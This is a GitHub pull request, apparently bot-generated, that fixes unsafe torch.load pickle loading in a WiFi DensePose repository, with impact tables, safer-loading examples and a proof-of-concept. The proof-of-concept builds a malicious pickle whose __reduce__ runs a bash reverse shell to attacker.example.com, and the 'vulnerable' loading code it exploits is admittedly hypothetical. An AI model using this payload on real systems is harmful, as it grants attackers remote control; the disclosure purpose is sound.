
[Security] Fix HIGH vulnerability: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch#106

Open
anupamme wants to merge 1 commit into ruvnet:main from
anupamme:fix-trailofbits.python.pickles-in-pytorch.pickles-in-pytorch-references-wifi-densepose-pytorch.py

Conversation

@anupamme anupamme commented Mar 3, 2026

Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

| Aspect | Rating | Rationale |
| --- | --- | --- |
| Impact | High | In this repository's PyTorch-based DensePose model implementation, exploitation could allow arbitrary code execution if a malicious pickle file is loaded, potentially compromising the system running the code and leading to data theft or further attacks, especially if deployed in an application processing user-provided model files. The reference script in wifi_densepose_pytorch.py likely handles model serialization, making it a direct vector for code injection during load operations. Consequences include unauthorized access to sensitive data or system resources in a research or demo environment that might later be extended to production use. |
| Likelihood | Medium | Since the repository is a public GitHub project focused on WiFi DensePose research, exploitation requires an attacker to provide or tamper with a pickle-based model file that the code then loads. This is plausible where models are shared or accepted from untrusted sources, but unlikely in isolated research runs without external inputs. The attack surface is limited to users executing the script locally or in controlled deployments, reducing exposure compared to widely deployed services. Some knowledge of the code's use of pickle is needed, but publicly available tools for crafting malicious pickles make exploitation moderately feasible for motivated attackers. |
| Ease of Fix | Medium | Remediation involves refactoring wifi_densepose_pytorch.py to replace pickle-based model loading/saving with PyTorch's safer state_dict method or alternatives like ONNX, requiring updates to load and save calls that may affect model compatibility and necessitate re-testing. The change could be breaking if the script integrates with other parts of the repository, and ensuring no data loss during migration adds moderate complexity. It is not an architectural overhaul, however, and is achievable with targeted code modifications. |
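The principle behind the state_dict remediation can be illustrated without PyTorch: persist model parameters as plain data in a format that cannot encode code. The parameter names below are hypothetical stand-ins for a real state_dict.

```python
import json

# Hypothetical "model parameters" as plain data -- conceptually what a
# PyTorch state_dict is: a mapping from parameter names to numeric arrays.
params = {
    "conv1.weight": [[0.1, -0.2], [0.3, 0.4]],
    "conv1.bias": [0.0, 0.5],
}

# A data-only format (JSON here, standing in for
# torch.save(model.state_dict(), path)) round-trips values but has no way
# to smuggle in callables, so loading cannot execute attacker code.
blob = json.dumps(params)
restored = json.loads(blob)
assert restored == params
```

With PyTorch itself, the analogous pattern is saving `model.state_dict()` and restoring it with `model.load_state_dict(torch.load(path, weights_only=True))`.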

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in references/wifi_densepose_pytorch.py stems from calling PyTorch's torch.load() without safeguards such as weights_only=True (available since PyTorch 1.13 and the default from 2.6) or restricting loads to a state_dict. By default, torch.load() deserializes arbitrary pickle objects, enabling remote code execution (RCE) if an attacker can supply or replace a model file (e.g., a .pth or .pkl file) that the code loads. In this repository's context, a PyTorch-based pose estimation model for WiFi data, an attacker could craft a malicious model file that executes code when loaded during inference or training, potentially compromising the system running the model.

# Step 1: Attacker creates a malicious pickle object that executes arbitrary code
# This uses Python's pickle to serialize a class with a __reduce__ method that runs a command
import pickle
import os

class MaliciousPickle:
    def __reduce__(self):
        # Example: Execute a reverse shell to attacker's server
        # In a real exploit, this could be a more sophisticated payload like exfiltrating data or installing malware
        return (os.system, ('bash -i >& /dev/tcp/attacker.example.com/4444 0>&1',))

# Serialize the malicious object to a file that mimics a PyTorch model
malicious_model = MaliciousPickle()
with open('malicious_model.pth', 'wb') as f:
    pickle.dump(malicious_model, f)

# Step 2: Attacker distributes or replaces the legitimate model file
# For example, via social engineering (e.g., convincing a user to download from a malicious repo)
# or if the model is loaded from an untrusted source in the code.
# The repository's code likely loads models like this (based on typical PyTorch usage):
# model = torch.load('path/to/model.pth')  # Vulnerable if no safety measures
# Step 3: Vulnerable code in references/wifi_densepose_pytorch.py loads the malicious file
# Assuming the file contains something like this (inferred from PyTorch model loading patterns):
import torch

# Hypothetical vulnerable loading code (based on the file's purpose in pose estimation)
def load_model(model_path):
    model = torch.load(model_path)  # This deserializes the pickle, triggering RCE
    return model

# Attacker's exploit: If the model_path points to 'malicious_model.pth', RCE occurs
loaded_model = load_model('malicious_model.pth')  # Executes the reverse shell payload
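The deserialization mechanics above can be verified harmlessly with the standard library alone: unpickling an object whose `__reduce__` returns a callable executes that callable at load time. Here the payload is benign (`sorted`) rather than `os.system`.

```python
import pickle

class BenignReduce:
    # __reduce__ tells the unpickler "call this callable with these
    # arguments" -- whatever the callable is, it runs during loading.
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

payload = pickle.dumps(BenignReduce())

# Unpickling does not return a BenignReduce instance; it executes
# sorted([3, 1, 2]) and hands back the result.
result = pickle.loads(payload)
print(result)  # [1, 2, 3]
```

Swapping `sorted` for `os.system` is all that separates this demo from the reverse-shell payload above.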

Exploitation Impact Assessment

| Impact Category | Severity | Description |
| --- | --- | --- |
| Data Exposure | High | Successful RCE could allow exfiltration of sensitive data processed by the pose estimation model, such as WiFi signal data, user images/videos, or locally stored training datasets. If the repository handles personal or proprietary data (e.g., in research or commercial applications), this could leak confidential information such as user poses or biometric data. |
| System Compromise | High | Arbitrary code execution grants full control over the host system, including installing backdoors, escalating privileges, or pivoting to other networked systems. In a typical deployment (e.g., a GPU-enabled server or cloud instance), this could lead to root access and compromise of all running processes, including other ML models or services. |
| Operational Impact | Medium | The exploit could cause denial of service by corrupting model state or exhausting resources during execution, disrupting pose estimation tasks. If the model is part of a real-time application (e.g., WiFi-based tracking), this might halt operations, requiring model reloads or system restarts, with potential downtime in production environments. |
| Compliance Risk | High | Violates OWASP Top 10 A08:2021 (Software and Data Integrity Failures) and could breach GDPR if EU user data (e.g., images for pose estimation) is processed. In regulated industries such as healthcare or security, it risks HIPAA or similar violations if the model handles sensitive biometric data, failing audit requirements for secure ML deployments. |

Vulnerability Details

  • Rule ID: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch
  • File: references/wifi_densepose_pytorch.py
  • Description: Functions reliant on pickle can result in arbitrary code execution. Consider loading from state_dict, using fickling, or switching to a safer serialization method like ONNX
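Beyond the PyTorch-specific options above, the Python pickle documentation describes a general mitigation: a restricted unpickler that refuses any global not on an allowlist. A sketch follows; the allowlist here is a hypothetical minimal example, not taken from this repository.

```python
import builtins
import io
import os
import pickle

SAFE_BUILTINS = {"list", "dict", "set", "tuple", "frozenset"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Allow only a small set of harmless builtins; anything else
        # (os.system, subprocess.Popen, ...) is refused outright.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# A payload that tries to smuggle in os.system is rejected at load time:
class Malicious:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

try:
    restricted_loads(pickle.dumps(Malicious()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
print(blocked)  # True
```

Plain data still round-trips: `restricted_loads(pickle.dumps({"a": 1}))` returns `{"a": 1}`. This hardens generic pickle use; for PyTorch model files specifically, `weights_only=True` or a state_dict workflow is the more direct fix.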

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

  • references/wifi_densepose_pytorch.py

Verification

This fix has been automatically verified through:

  • ✅ Build verification
  • ✅ Scanner re-scan
  • ✅ LLM code review

🤖 This PR was automatically generated.

….pickles-in-pytorch

Automatically generated security fix